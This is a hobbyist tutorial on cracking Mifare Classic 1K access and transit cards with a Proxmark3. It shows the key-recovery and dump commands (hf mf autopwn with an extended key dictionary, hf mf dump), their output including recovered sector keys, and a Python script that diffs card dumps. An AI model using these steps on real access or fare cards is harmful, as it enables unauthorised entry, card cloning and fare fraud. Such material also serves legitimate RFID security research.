So, I thought it was about time for some quick fun with Mifare Classic 1k cards, and how to crack them.
Now, there are some hardware requirements for this: either you need a Proxmark3 and an extended Mifare key dictionary, or you could use something else, like a Flipper Zero.
But you also need some patience, and a target key fob, card or something like it based on Mifare Classic. (Yes, it could be an old hotel access card, public transportation card and so on..)

First, if you have the hardware covered, let's move on. If you're doing this on a Flipper Zero, simply go to nfc --> read card, wait, and you should be done. But let's try it with a Proxmark3 also.

Go get the extended key file and save it into your proxmark directory as ext-std.dic (the PM3 looks for the .dic file extension). Next, connect your PM3 and place the tag.

Now, let's look for the tag, and see if it's there.

hf search
 🕓  Searching for ISO14443-A tag...          
[+]  UID: CB 46 83 3C 
[+] ATQA: 00 04
[+]  SAK: 08 [2]
[+] Possible types:
[+]    MIFARE Classic 1K
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Prng detection: hard

#TAG is obfuscated, not real tag :)

Now, I'm lazy, so let's try the autopwn feature with the new dictionary.

hf mf autopwn --1k -f ext-std

[=] MIFARE Classic EV1 card detected
[=] target sector  17 key type B -- using valid key [ 4B 79 1B EA 7B CC ] (used for nested / hardnested attack)
[+] loaded 1462 keys from dictionary file ext-std.dic
[=] running strategy 1
[=] ......
[=] Chunk 12,1s | found 10/36 keys (85)
[=] Chunk 1,0s | found 10/36 keys (85)
[=] Chunk 1,1s | found 10/36 keys (85)

Now let it run. If you see output like this (shortened a bit here) for all sectors, it means our Proxmark recovered the keys for every sector.

found keys:

[+] -----+-----+--------------+---+--------------+----
[+]  Sec | Blk | key A        |res| key B        |res
[+] -----+-----+--------------+---+--------------+----
[+]  000 | 003 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  001 | 007 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  002 | 011 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  005 | 023 | 6A1987C40A21 | D | 7F33625BC129 | D
[+]  006 | 027 | 6A1987C40A21 | D | 7F33625BC129 | D

If it found all the keys, it should make a binary dump; a response like this will tell you whether it did.

Generating binary key file
[+] Found keys have been dumped to hf-mf-xxxxxxxx-key.bin
wrong response len 0 (expected 18)

[=] fast dump reported back failure w KEY B
[=] Dump file is PARTIAL complete
[=] downloading the card content from emulator memory
[+] saved 1024 bytes to binary file hf-mf-XXXXXXXX-dump.bin
[+] saved 64 blocks to text file hf-mf-XXXXXXXX-dump.eml
[+] saved to json file hf-mf-XXXXXXXX-dump.json
[=] autopwn execution time: 86 seconds

Here it tells us that it wrote our dump files, so we can reload them later or copy them to other devices. BUT note that it said the dump is only PARTIAL complete, so did we get everything? We can try to fix this by running the next command, which reads the card again using the key file autopwn just saved.

[usb] pm3 --> hf mf dump

Using `hf-mf-XXXXXXXX-key.bin`

[=] Reading sector access bits...
[=] .................
[+] Finished reading sector access bits
[=] Dumping all blocks from card...
[+] successfully read block  0 of sector  0.
[+] successfully read block  1 of sector  0.
[+] successfully read block  2 of sector  0.
[+] successfully read block  3 of sector  0.
[+] successfully read block  0 of sector  1.
[+] successfully read block  1 of sector  1.
[+] successfully read block  2 of sector  1.
[+] successfully read block  3 of sector  1.
[+] successfully read block  0 of sector  2.
[+] successfully read block  1 of sec

And so on :)

When it's done, it will tell us that writing dump files succeeded.

Succeeded in dumping all blocks

[+] saved 1024 bytes to binary file hf-mf-XXXXXXXX-dump-1.bin
[+] saved 64 blocks to text file hf-mf-XXXXXXXX-dump-1.eml
[+] saved to json file hf-mf-XXXXXXXX-dump-1.json

[usb] pm3 --> 

Now, go have a look at the json file and the eml file; they contain the raw data from the card. The eml file is for loading the card into the Proxmark simulator feature, and the json can be imported / exported to other devices.

Some systems write to sectors on the tag as a kind of security check, so dump the tag each time you use it and run diff on the dumps to see what changes between uses.
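As an added example (not code from the original post or from the Proxmark3 project), here is a small Python script that parses two .eml dumps of the same card and reports which blocks changed between uses, tagging each change as a sector trailer, a Mifare value block, or plain data. The sample_dump() function builds constructed dumps for demonstration; replace it with the contents of your own hf-mf-XXXXXXXX-dump.eml files.

```python
import re

BLOCKS_1K = 64  # MIFARE Classic 1K: 16 sectors x 4 blocks, 16 bytes per block

def parse_eml(text):
    """Parse a Proxmark3 .eml dump (one block per line as 32 hex chars) into 16-byte blocks."""
    blocks = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        line = line.strip()
        if not re.fullmatch(r"[0-9A-Fa-f]{32}", line):
            raise ValueError(f"line {n}: expected 32 hex chars, got {line!r}")
        blocks.append(bytes.fromhex(line))
    if len(blocks) != BLOCKS_1K:
        raise ValueError(f"expected {BLOCKS_1K} blocks, got {len(blocks)}")
    return blocks

def is_trailer(block_no):  # every 4th block of a 1K card holds key A, access bits, key B
    return block_no % 4 == 3

def is_value_block(data):
    """Detect the Mifare value-block layout: value, ~value, value, addr, ~addr, addr, ~addr."""
    v, nv, v2 = data[0:4], data[4:8], data[8:12]
    return (v == v2 and bytes(b ^ 0xFF for b in v) == nv
            and data[12] == data[14] and data[13] == data[15] and data[12] ^ data[13] == 0xFF)

def diff_dumps(old, new):
    """Return (block, sector, kind) for each block that differs between two dumps of the same card."""
    changes = []
    for i, (a, b) in enumerate(zip(old, new)):
        if a != b:
            kind = ("trailer (keys/access bits)" if is_trailer(i)
                    else "value block" if is_value_block(b) else "data")
            changes.append((i, i // 4, kind))
    return changes

def sample_dump(counter):
    """Constructed sample dump, not a real card: block 4 holds a counter, block 5 mirrors it as a value block."""
    lines = []
    for i in range(BLOCKS_1K):
        if is_trailer(i):  # default keys FFFFFFFFFFFF with transport access bits FF 07 80 69
            blk = bytes.fromhex("FFFFFFFFFFFFFF078069FFFFFFFFFFFF")
        elif i == 4:
            blk = counter.to_bytes(2, "big") + bytes(14)
        elif i == 5:
            v = counter.to_bytes(4, "little")
            blk = v + bytes(b ^ 0xFF for b in v) + v + bytes([5, 0xFA, 5, 0xFA])
        else:
            blk = bytes(16)
        lines.append(blk.hex().upper())
    return "\n".join(lines)
```

Comparing sample_dump(1) against sample_dump(2) reports blocks 4 and 5 of sector 1 as changed, which is the kind of per-use write you are looking for when a system uses the tag as a counter or check value.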

A couple of resources:

https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/cheatsheet.md

https://raw.githubusercontent.com/ikarus23/MifareClassicTool/master/Mifare%20Classic%20Tool/app/src/main/assets/key-files/extended-std.keys

Have fun :)
